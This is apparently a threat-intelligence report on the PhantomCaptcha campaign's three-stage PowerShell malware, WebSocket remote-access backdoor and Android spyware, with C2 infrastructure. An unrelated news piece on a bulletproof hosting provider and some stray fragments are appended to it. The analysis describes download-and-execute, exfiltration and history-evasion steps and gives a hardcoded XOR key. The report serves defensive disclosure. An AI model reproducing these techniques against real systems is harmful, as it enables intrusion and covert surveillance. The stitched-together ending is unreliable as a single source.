This social engineering technique is particularly effective because the malicious code is executed by the user themselves, evading endpoint security controls that focus solely on detecting malicious files.
Infection paths
Our analysis suggests this attack chain has overlaps with recently-reported activity attributed to COLDRIVER, a Russian FSB-linked threat cluster, by several industry peers [1, 2, 3]. We continue to investigate whether this attribution can be confidently extended to the PhantomCaptcha campaign.
Multi-Stage Payload Delivery
Although the malware distribution server at zoomconference[.]app was not available at the time of analysis, we managed to discover additional infrastructure and payloads from malware repositories by querying for files from URLs ending with /cptch.
Our analysis revealed that the PhantomCaptcha campaign aimed to deliver PowerShell malware in three stages.
Stage 1: Obfuscated Downloader
The initial payload (SHA-256: 3324550964ec376e74155665765b1492ae1e3bdeb35d57f18ad9aaca64d50a44) was a heavily obfuscated PowerShell script named cptch and exceeding 500KB in size. Despite its apparent complexity, the cptch script’s core functionality is simply to download and execute a second-stage payload from hxxps://bsnowcommunications[.]com/maintenance.
The cptch file is a heavily obfuscated PowerShell script
The entire inflated script can be reduced to a single line:
Using massive obfuscation to obscure simple functionality is likely designed to evade signature-based detection and complicate analysis efforts.
Stage 2: Fingerprinting and Encrypted Comms
The second-stage payload (SHA-256: 4bc8cf031b2e521f2b9292ffd1aefc08b9c00dab119f9ec9f65219a0fbf0f566) is named maintenance and performs system reconnaissance, collecting:
Computer name
Domain information
Username
Process ID
System UUID (hardware identifier)
This data was XOR-encrypted with the hardcoded key b3yTKRaP4RHKYQMf0gMd4fw1KNvBtv3l and sent to hxxps://bsnowcommunications[.]com/maintenance/<data> via HTTP GET requests.
Part of the maintenance script and the hardcoded XOR key used for encryption
The script also disabled PowerShell command history logging via Set-PSReadlineOption -HistorySaveStyle SaveNothing as a means of evading forensic analysis.
The server responded with an encrypted payload containing the third and final stage, which was decrypted and executed in memory.
Stage 3: WebSocket-Based Remote Access Trojan
The final payload (SHA-256: 19bcf7ca3df4e54034b57ca924c9d9d178f4b0b8c2071a350e310dd645cd2b23) is a lightweight PowerShell backdoor that connects (and repeatedly reconnects) to a remote WebSocket server at wss://bsnowcommunications[.]com:80. It receives Base64-encoded JSON messages that contain one of:
cmd: a command that is decoded and executed with iex (Invoke-Expression) synchronously; Executing a command with iex (Invoke-Expression)
psh: a PowerShell payload decoded and executed asynchronously using a PowerShell runspace delegate. Executing a PowerShell payload from the server
After execution, the script collects output, the current working directory, the machine HWID (UUID via WMI), PID, and an IDC identifier from the server message, converts that to JSON, and sends it back over the WebSocket. It is designed to run in an infinite loop, with reconnect logic and basic error handling.
The WebSocket-based RAT is a remote command execution backdoor, effectively a remote shell that gives an operator arbitrary access to the host.
Infrastructure Analysis
PhantomCaptcha demonstrated a moderate level of operational security through its brief active window. The C2 domain zoomconference[.]app resolved to 193.233.23[.]81, a VPS server hosted by Russian provider KVMKA. SentinelLABS’ analysis revealed the infrastructure was active for only about 24 hours on October 8, 2025, with ports 443 and 80 closed by the time of our investigation.
By fingerprinting the cached server response, we were able to identify a further malicious IP address 45.15.156[.]24, which resolves from goodhillsenterprise[.]com and has previously been seen serving obfuscated PowerShell malware scripts [1, 2]. We assess, with medium confidence, that 45.15.156[.]24 is currently or has recently been under the control of the threat actors behind PhantomCaptcha.
The C2 domain bsnowcommunications[.]com is linked to IP 185.142.33[.]131. Unlike the public-facing lure domain, this backend C2 infrastructure remains active, indicating strong compartmentalization and the need to maintain certain infrastructure for already-compromised systems.
We also found that on October 9, 2025, the day after the initial attack, a domain with the name zoomconference[.]click was registered, potentially indicating plans for continued operations.
PhantomCaptcha 2025 Attack Timeline
March – According to the earliest related event (registration of goodhillsenterprise[.]com), the attackers started their operations on 2025-03-27.
July – A number of malicious PowerShell scripts and other malware samples were developed and tested on VirusTotal in July 2025.
September – SSL certificates from Let’s Encrypt for the related domains were issued on Sep 15 and Sep 25, 2025.
October – Internal timestamps from the lure PDF document are dated back to Aug 2025, but were updated on Oct 8, 2025. The email with malicious attachment was also sent out on Oct 8, 2025. On the same day, the attack domain was shut down only to appear the following day (Oct 9, 2025) under a different top level domain.
Pivot to Additional Campaign
One interesting pivot from our infrastructure analysis revealed a link to a wider campaign making use of adult-oriented social and entertainment lures, with potential links to Russia/Belarus source development.
As noted earlier, the PhantomCaptcha zoom-themed domains were hosted on 193.233.23[.]81. During our analysis, the same IP began hosting a new domain, princess-mens[.]click, which appeared similar in ownership and configuration. Collected HTTPS response data from zoomconference[.]click also began including content identical to that found in the new domain, indicating a direct overlap in ownership of both domains.
Domain timeline, focused on October and later, on 193.233.23[.]81zoomconference[.]click HTTPS response data matching princess-mens[.]click
The princess-mens[.]click domain has been observed linked to an Android application called princess.apk, hosted at https://princess-mens[.]click/princess.apk. The domain’s content and the APK are themed around an adult entertainment venue in Lviv, Ukraine, called Princess Men’s Club. Similar APKs can be found in other themes as well, such as “Cloud Storage”.
App requesting device location
The application collects a variety of data to send to a hardcoded C2, which itself can be linked to additional infrastructure and samples. The samples use the HTTPS protocol and communicate over port 5000 to various server paths such as /check_update, /data, and /upload. For example:
https://[IP ADDRESS]:5000/check_update?version=[APP VERSION NUMBER]
The APK’s collectAndSendAllData() method is designed to gather a wide range of personal and device information. Based on the variable names in the code, the specific data being collected appears to be as follows.
Contacts data
phonebook entries (names, numbers, emails).
Call logs
incoming, outgoing, and missed calls.
Installed apps
list of all installed applications.
SIM numbers/data
SIM card information such as numbers, IMSI, or carrier details.
Device info
hardware model, OS version, manufacturer, and possibly device ID.
Network info
connected network type (Wi-Fi, mobile, etc).
Wi-Fi SSID
name of the currently connected Wi-Fi network.
Location data
GPS or last known location of the device.
Public IP address
external IP visible to the internet.
Gallery images
photos or image metadata stored on the device.
While these findings indicate a possible relation to the PhantomCaptcha campaign, we are currently tracking it as a separate cluster of activity and encourage the research community to further pursue this lead for additional insight. We provide indicators that may be fruitful to explore at the end of this post.
Security Implications
Legitimate services do not require pasting commands into Windows Run dialog (Win+R) or similar interfaces. Hence, user awareness training on “Paste and Run” social engineering techniques can help prevent attacks using this infection vector. Similarly, unexpected communications from government offices can be independently verified through known channels.
From a technical perspective, PowerShell execution logging and monitoring provides visibility into commands using hidden window styles, execution policy bypasses, or attempts to disable command history logging. Additionally, network security teams can monitor for WebSocket connections to recently-registered or suspicious domains, particularly those mimicking legitimate services.
We provide a comprehensive list of Indicators of Compromise below to support threat hunting and detection efforts.
Conclusion
The PhantomCaptcha campaign reflects a highly capable adversary, demonstrating extensive operational planning, compartmentalized infrastructure, and deliberate exposure control. The six-month period between initial infrastructure registration and attack execution, followed by the swift takedown of user-facing domains while maintaining backend command-and-control, underscores an operator well-versed in both offensive tradecraft and defensive detection evasion.
The targeting of organizations supporting Ukraine’s relief efforts also reveal an adversary seeking intelligence across humanitarian operations, reconstruction planning, and international coordination efforts.
SentinelLABS continues to monitor infrastructure associated with this threat actor and will provide updates as new information becomes available.
Acknowledgments
We would like to express our thanks to partners in the region, including Digital Security Lab of Ukraine for their invaluable collaboration on this case.
Organizations that believe they may have been targeted by threat actors involved in this campaign are invited to reach out to the SentinelLABS team via ThreatTips@sentinelone.com.
In May 2025, the European Union levied financial sanctions on the owners of Stark Industries Solutions Ltd., a bulletproof hosting provider that materialized two weeks before Russia invaded Ukraine and quickly became a top source of Kremlin-linked cyberattacks and disinformation campaigns. But new findings show those sanctions have done little to stop Stark from simply rebranding and transferring their assets to other corporate entities controlled by its original hosting providers.
Image: Shutterstock.
Materializing just two weeks before Russia invaded Ukraine in 2022, Stark Industries Solutions became a frequent source of massive DDoS attacks, Russian-language proxy and VPN services, malware tied to Russia-backed hacking groups, and fake news. ISPs like Stark are called “bulletproof” providers when they cultivate a reputation for ignoring any abuse complaints or police inquiries about activity on their networks.
In May 2025, the European Union sanctioned one of Stark’s two main conduits to the larger Internet — Moldova-based PQ Hosting — as well as the company’s Moldovan owners Yuri and Ivan Neculiti. The EU Commission said the Neculiti brothers and PQ Hosting were linked to Russia’s hybrid warfare efforts.
But a new report from Recorded Future finds that just prior to the sanctions being announced, Stark rebranded to the[.]hosting, under control of the Dutch entity WorkTitans BV (AS209847) on June 24, 2025. The Neculiti brothers reportedly got a heads up roughly 12 days before the sanctions were announced, when Moldovan and EU media reported on the forthcoming inclusion of the Neculiti brothers in the sanctions package.
In response, the Neculiti brothers moved much of Stark’s considerable address space and other resources over to a new company in Moldova called PQ Hosting Plus S.R.L., an entity reportedly connected to the Neculiti brothers thanks to the re-use of a phone number from the original PQ Hosting.
“Although the majority of associated infrastructure remains attributable to Stark Industries, these changes likely reflect an attempt to obfuscate ownership and sustain hosting services under new legal and network entities,” Recorded Future observed.
Neither the Recorded Future report nor the May 2025 sanctions from the EU mentioned a second critical pillar of Stark’s network that KrebsOnSecurity identified in a May 2024 profile on the notorious bulletproof hoster: The Netherlands-based hosting provider MIRhosting.
MIRhosting is operated by 38-year old Andrey Nesterenko, whose personal website says he is an accomplished concert pianist who began performing publicly at a young age. DomainTools says mirhosting[.]com is registered to Mr. Nesterenko and to Innovation IT Solutions Corp, which lists addresses in London and in Nesterenko’s stated hometown of Nizhny Novgorod, Russia.
Image credit: correctiv.org.
According to the book Inside Cyber Warfare by Jeffrey Carr, Innovation IT Solutions Corp. was responsible for hosting StopGeorgia[.]ru, a hacktivist website for organizing cyberattacks against Georgia that appeared at the same time Russian forces invaded the former Soviet nation in 2008. That conflict was thought to be the first war ever fought in which a notable cyberattack and an actual military engagement happened simultaneously.
Mr. Nesterenko did not respond to requests for comment. In May 2024, Mr. Nesterenko said he couldn’t verify whether StopGeorgia was ever a customer because they didn’t keep records going back that far. But he maintained that Stark Industries Solutions was merely one client of many, and claimed MIRhosting had not received any actionable complaints about abuse on Stark.
However, it appears that MIRhosting is once again the new home of Stark Industries, and that MIRhosting employees are managing both the[.]hosting and WorkTitans — the primary beneficiaries of Stark’s assets.
A copy of the incorporation documents for WorkTitans BV obtained from the Dutch Chamber of Commerce shows WorkTitans also does business under the names Misfits Media and and WT Hosting (considering Stark’s historical connection to Russian disinformation websites, “Misfits Media” is a bit on the nose).
An incorporation document for WorkTitans B.V. from the Netherlands Chamber of Commerce.
The incorporation document says the company was formed in 2019 by a y.zinad@worktitans.nl. That email address corresponds to a LinkedIn account for a Youssef Zinad, who says their personal websites are worktitans[.]nl and custom-solution[.]nl. The profile also links to a website (etripleasims dot nl) that LinkedIn currently blocks as malicious. All of these websites are or were hosted at MIRhosting.
Although Mr. Zinad’s LinkedIn profile does not mention any employment at MIRhosting, virtually all of his LinkedIn posts over the past year have been reposts of advertisements for MIRhosting’s services.
Mr. Zinad’s LinkedIn profile is full of posts for MIRhosting’s services.
A Google search for Youssef Zinad reveals multiple startup-tracking websites that list him as the founder of the[.]hosting, which censys.io finds is hosted by PQ Hosting Plus S.R.L.
The Dutch Chamber of Commerce document says WorkTitans’ sole shareholder is a company in Almere, Netherlands called Fezzy B.V. Who runs Fezzy? The phone number listed in a Google search for Fezzy B.V. — 31651079755 — also was used to register a Facebook profile for a Youssef Zinad from the same town, according to the breach tracking service Constella Intelligence.
In a series of email exchanges leading up to KrebsOnSecurity’s May 2024 deep dive on Stark, Mr. Nesterenko included Mr. Zinad in the message thread (youssef@mirhosting.com), referring to him as part of the company’s legal team. The Dutch website stagemarkt[.]nl lists Youssef Zinad as an official contact for MIRhosting’s offices in Almere. Mr. Zinad did not respond to requests for comment.
Given the above, it is difficult to argue with the Recorded Future report on Stark’s rebranding, which concluded that “the EU’s sanctioning of Stark Industries was largely ineffective, as affiliated infrastructure remained operational and services were rapidly re-established under new branding, with no significant or lasting disruption.”
Entrar
Research has tracked Pawn Storm’s activities across three distinct but interconnected campaigns, each building upon its previous infrastructure and tooling.” reads the 
![Initial view of a page from zoomconference[.]app](https://www.sentinelone.com/wp-content/uploads/2025/10/PhantomCaptcha_4.jpg)
![Domain timeline, focused on October and later, on 193.233.23[.]81](https://www.sentinelone.com/wp-content/uploads/2025/10/PhantomCaptcha_1.jpg)
![zoomconference[.]click HTTPS response data matching princess-mens[.]click](https://www.sentinelone.com/wp-content/uploads/2025/10/PhantomCaptcha_6.jpg)
